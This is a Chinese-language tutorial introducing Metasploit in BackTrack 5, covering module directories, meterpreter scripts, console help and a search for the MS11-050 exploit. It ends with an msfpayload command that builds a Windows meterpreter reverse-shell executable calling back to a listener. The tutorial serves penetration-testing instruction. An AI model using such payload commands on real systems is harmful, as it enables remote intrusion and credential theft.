一、msf (metasploit framework)讲解
环境 bt5 R3
root@bt:/# cd /pentest/exploits/framework
可以看到相关的接口 msfcli msfconsole,msfd .............
主要用到的有 msfconsole msfpayload scripts msfencode...
exploits 一些攻击脚本
payloads是exploits 成功后进行的操作 如反弹shell
encoders 编码 对 payloads进行一定的编码等保护 避免被查杀
nops 对exploits的保护,避免被远程主机的IDS 等发现
auxiliary: 对主机进行扫描,系统应用的指纹
plugins 对MSF进行扩展, 如果提供对扫描模块支持,数据库支持
root@bt:/pentest/exploits/framework/modules# ll
total 36
drwxr-xr-x 8 root root 4096 2012-08-09 17:49 ./
drwxr-xr-x 13 root root 4096 2012-08-26 02:56 ../
drwxr-xr-x 19 root root 4096 2012-08-26 02:56 auxiliary/
drwxr-xr-x 11 root root 4096 2012-08-09 17:49 encoders/
drwxr-xr-x 15 root root 4096 2012-08-26 02:23 exploits/
-rw-r--r-- 1 root root 733 2012-05-03 17:25 modules.rb.ts.rb
drwxr-xr-x 9 root root 4096 2012-08-09 17:49 nops/
drwxr-xr-x 5 root root 4096 2012-08-09 17:49 payloads/
drwxr-xr-x 9 root root 4096 2012-08-09 17:49 post/
进入模块可以看到主要有5,6个模块
root@bt:/pentest/exploits/framework/modules# cd exploits/ 可以看到针对不同系统的漏洞攻击
root@bt:/pentest/exploits/framework/modules/exploits# ll
total 60
drwxr-xr-x 15 root root 4096 2012-08-26 02:23 ./
drwxr-xr-x 8 root root 4096 2012-08-09 17:49 ../
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 aix/ aix系统
drwxr-xr-x 3 root root 4096 2012-08-09 17:49 bsdi/
drwxr-xr-x 3 root root 4096 2012-08-09 17:49 dialup/
drwxr-xr-x 6 root root 4096 2012-08-09 17:49 freebsd/
drwxr-xr-x 3 root root 4096 2012-08-09 17:49 hpux/
drwxr-xr-x 3 root root 4096 2012-08-09 17:49 irix/
drwxr-xr-x 18 root root 4096 2012-08-09 17:51 linux/ linux系统
drwxr-xr-x 15 root root 4096 2012-08-09 17:49 multi/
drwxr-xr-x 4 root root 4096 2012-08-09 17:49 netware/
drwxr-xr-x 13 root root 4096 2012-08-09 17:49 osx/
drwxr-xr-x 7 root root 4096 2012-08-09 17:49 solaris/
drwxr-xr-x 9 root root 4096 2012-08-09 17:51 unix/
drwxr-xr-x 50 root root 4096 2012-08-09 17:51 windows/
root@bt:/pentest/exploits/framework/modules/exploits# ls windows/ 看到很多是windows系统的溢出使用
antivirus dcerpc ftp isapi misc nntp scada telnet
arkeia driver games ldap mmsp novell sip tftp
backdoor email http license motorola oracle smb unicenter
backupexec emc ids local mssql pop3 smtp vnc
brightstor fileformat iis lotus mysql postgres ssh vpn
browser firewall imap lpd nfs proxy ssl wins
root@bt:/pentest/exploits/framework/modules/auxiliary# ll auxiliary和exploit区别是auxiliary没有payload , 所以该模块一般用来扫描
total 76
drwxr-xr-x 19 root root 4096 2012-08-26 02:56 ./
drwxr-xr-x 8 root root 4096 2012-08-09 17:49 ../
drwxr-xr-x 34 root root 4096 2012-08-09 17:49 admin/
drwxr-xr-x 2 root root 4096 2012-08-09 17:51 analyze/
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 bnat/
drwxr-xr-x 3 root root 4096 2012-08-09 17:49 client/
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 crawler/
drwxr-xr-x 20 root root 4096 2012-08-09 17:49 dos/
drwxr-xr-x 10 root root 4096 2012-08-09 17:49 fuzzers/
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 gather/
drwxr-xr-x 3 root root 4096 2012-08-09 17:49 pdf/
drwxr-xr-x 48 root root 4096 2012-08-09 17:49 scanner/
drwxr-xr-x 4 root root 4096 2012-08-09 17:49 server/
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 sniffer/
drwxr-xr-x 8 root root 4096 2012-08-09 17:49 spoof/
drwxr-xr-x 3 root root 4096 2012-08-09 17:49 sqli/
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 voip/
drwxr-xr-x 5 root root 4096 2012-08-09 17:49 vsploit/
drwxr-xr-x 4 root root 4096 2012-08-26 02:36 xssf/
root@bt:/pentest/exploits/framework/scripts# ll 相当于 payload 可以返回shell
total 24
drwxr-xr-x 6 root root 4096 2012-08-09 17:49 ./
drwxr-xr-x 13 root root 4096 2012-08-26 02:56 ../
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 meterpreter/ 一般这个比较游泳 windows/meterpreter/reverse_tcp
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 ps/
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 resource/
drwxr-xr-x 2 root root 4096 2012-08-09 17:49 shell/
root@bt:/pentest/exploits/framework/scripts# ls meterpreter/ meterpreter脚本利用
arp_scanner.rb get_pidgin_creds.rb remotewinenum.rb
autoroute.rb gettelnet.rb scheduleme.rb
checkvm.rb get_valid_community.rb schelevator.rb
credcollect.rb getvncpw.rb schtasksabuse.rb
domain_list_gen.rb hashdump.rb scraper.rb
dumplinks.rb hostsedit.rb screenspy.rb
duplicate.rb keylogrecorder.rb screen_unlock.rb
enum_chrome.rb killav.rb search_dwld.rb
enum_firefox.rb metsvc.rb service_manager.rb
enum_logged_on_users.rb migrate.rb service_permissions_escalate.rb
enum_powershell_env.rb multicommand.rb sound_recorder.rb
enum_putty.rb multi_console_command.rb srt_webdrive_priv.rb
enum_shares.rb multi_meter_inject.rb uploadexec.rb
enum_vmware.rb multiscript.rb virtualbox_sysenter_dos.rb
event_manager.rb netenum.rb virusscan_bypass.rb
file_collector.rb packetrecorder.rb vnc.rb
get_application_list.rb panda_2007_pavsrv51.rb webcam.rb
getcountermeasure.rb persistence.rb win32-sshclient.rb
get_env.rb pml_driver_config.rb win32-sshserver.rb
get_filezilla_creds.rb powerdump.rb winbf.rb
getgui.rb prefetchtool.rb winenum.rb
get_local_subnets.rb process_memdump.rb wmic.rb
root@bt:/pentest/exploits/framework# msfconsole 进入msf模式
msf > help
Core Commands
=============
Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
kill Kill a job
load Load a framework plugin
loadpath Searches for and loads modules from a path
makerc Save commands entered since start to a file
popm Pops the latest module off of the module stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
quit Exit the console
reload_all Reloads all modules from all defined module paths
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers
Database Backend Commands
=========================
Command Description
------- -----------
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
msf > search ms11_050 查找功能
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/ms11_050_mshtml_cobjectelement 2011-06-16 00:00:00 UTC normal MS11-050 IE mshtml!CObjectElement Use After Free
show exploits
show payloads
show targets
root@bt:/# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=4444 X > /home/anubis/mm.exe #X表示生成可执行文件
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.0.106", "LPORT"=>"4444"}